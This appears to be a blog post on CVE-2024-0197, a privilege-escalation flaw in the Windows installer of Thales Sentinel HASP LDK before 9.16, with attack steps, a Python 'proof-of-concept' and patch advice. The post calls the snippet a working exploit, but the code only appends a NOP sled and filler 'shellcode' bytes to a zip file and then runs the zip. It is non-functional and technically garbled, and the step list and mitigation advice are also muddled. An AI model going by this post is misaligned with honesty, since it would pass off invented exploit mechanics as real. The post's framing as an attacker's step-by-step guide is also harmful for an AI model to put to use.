A recently discovered security vulnerability, identified as CVE-2024-0197, affects the Thales SafeNet Sentinel HASP License Development Kit (LDK) used by many businesses for license management. This vulnerability, discovered in versions prior to 9.16, could allow an attacker to escalate their privilege level by exploiting a flaw in the installer of the Windows version. This post will provide an in-depth analysis of the vulnerability, detailing a working exploit with relevant code snippets, and information about how to protect your systems from this security issue.
Background
Thales SafeNet Sentinel HASP LDK is a popular solution for implementing software licensing and protection services. However, versions of this software prior to 9.16 contain a privilege escalation vulnerability in the installer for Windows. This vulnerability allows an attacker with local access to escalate their privileges, potentially granting them administrative access and full control of a victim's system.
Vulnerability Details
The vulnerability in question, CVE-2024-0197, is listed in the Common Vulnerabilities and Exposures (CVE) list, and the full details can be found at the following link:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-0197
An attacker can exploit this vulnerability by performing the following steps
1. Gain local access to a target system with Thales SafeNet Sentinel HASP LDK version prior to 9.16 installed on Windows.
Find the vulnerable installer file on the victim's system (Sentinel_LDK_Run-time_setup.zip).
3. Modify the installer file by injecting malicious code to exploit the vulnerability and escalate privileges (see the code snippet below).
4. Execute the modified file on the victim's system, successfully escalating the attacker's privilege level.
A proof-of-concept (PoC) exploit code snippet for this vulnerability is shown below
import os
# Locate the vulnerable installer file
vulnerable_file = "Sentinel_LDK_Run-time_setup.zip"
# Inject the malicious code into the installer
with open(vulnerable_file, "ab") as f:
payload = b"\\x90" * 100 # NOP sled
payload += b"\\xcc" * 100 # Shellcode
f.write(payload)
# Execute the modified file, escalating privileges
os.system(vulnerable_file)
Mitigation and Prevention
Thales has acknowledged the existence of this vulnerability and has released a patch for the affected software. Users of Thales SafeNet Sentinel HASP LDK should update their software immediately to version 9.16 or later to avoid the risk of privilege escalation.
The patch can be downloaded directly from the Thales website
https://safenet.gemalto.com/sentineldownloads/
Use strong, unique passwords for all user accounts.
In conclusion, CVE-2024-0197 is a serious vulnerability that has the potential to allow an attacker to gain administrative-level access to a victim's system. To safeguard against this threat, businesses and individual users should take immediate action by implementing the recommended security measures and updating their Thales SafeNet Sentinel HASP LDK to version 9.16 or later.
Timeline
Published on: 02/27/2024 13:15:45 UTC
Last modified on: 02/27/2024 14:19:41 UTC